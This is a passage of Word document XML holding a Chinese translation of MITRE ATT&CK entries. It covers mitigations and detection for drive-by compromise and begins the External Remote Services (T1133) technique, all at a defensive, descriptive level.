            <w:r w:rsidRPr="00671A0D">
              <w:t>的影响。对于这些类型的系统，在实施中仍然可能存在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>其它</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缺陷</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>等风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5B97423C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2281EBFD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>漏洞利用防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D471902" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>安全应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>比如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>WDEG</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows Defender Exploit Guard</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>）和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>EMET</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Enhanced Mitigation Experience Toolkit</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查找</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>行为</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>从而缓解某些漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击行为</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的影响。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也可</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>通过控制流完整性检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>识别和阻止软件攻击。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>许多保护</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>措施</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>依赖于体系结构和目标应用二进制文件的兼容性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="50B58F7A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D4CFD6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>内容限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03362EFF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>用广告拦截器</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来立即阻止执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>广告</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>携带的恶意代码。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也可</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>通过脚本拦截扩展</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来阻止执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>过程中常用的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>JavaScript</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="49FBEF73" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="604E26EB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>软件更新</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3137EFEC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>更新所有</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>浏览器和插件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>。请使用启用了安全特性的最新浏览器。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="611DE9E3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A2A4DF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219BDF12" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>防火墙和代理</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>携带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>已知的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>域或参数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>网站及所求资源做信誉分析，例如分析域名的使用年数，注册人，是否在已知</w:t>
      </w:r>
      <w:r w:rsidRPr="00C729E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误列表</w:t>
      </w:r>
      <w:r w:rsidRPr="00C729E7">
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>之前有多少其他用户已连接到该域。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C98A21" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>网络入侵检测系统（有时</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SSL/TLS MITM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检查）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>查找已知的恶意脚本（常被重用的脚本有侦察</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>堆喷射和浏览器识别脚本）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>常见脚本混淆</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C516F7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>检测合法网站的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>木马攻陷可能是困难的。还要在端点系统上查</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>能表明</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻陷</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>成功的行为，例如浏览器进程的异常行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可疑文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>插入来试图掩盖执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>证据，发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>证据，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>表明</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>其它工具传输到系统的异常网络流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EC8B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00733C70">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>外部远程服务</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6DF5D630" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6335E24D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1133</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25378010" w14:textId="2EB7A23C" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="008F7150">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>持久</w:t>
            </w:r>
            <w:r w:rsidR="00B438B1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D38A25A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60B94DE8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FEE96BF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源：认证日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F19F295" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Daniel Oakley</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="617C05C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B26F32A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704B5252" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Citrix</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等远程服务以及其它访问机制允许用户从外部访问企业内部网络资源。通常有远程服务网关来管理这些服务连接和凭据认证。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程管理等服务也可以在外部使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1F93F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会通过远程服务来初始访问网络和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或在网络中停留。通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>须使用有效账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>访问服务。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会通过凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>欺</w:t>
      </w:r>
      <w:r w:rsidRPr="005C246E">
        <w:t>骗</w:t>
      </w:r>
      <w:r w:rsidRPr="005C246E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或入侵企业网络从用户侧获取凭据的</w:t>
      </w:r>
      <w:r w:rsidRPr="005C246E">
        <w:t>方式来获得有效账号权限</w:t>
      </w:r>
      <w:r w:rsidRPr="005C246E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00870F9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在操作期间，对远程服务的访问可用作冗余访问的一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E39744" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="45BE1CBD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
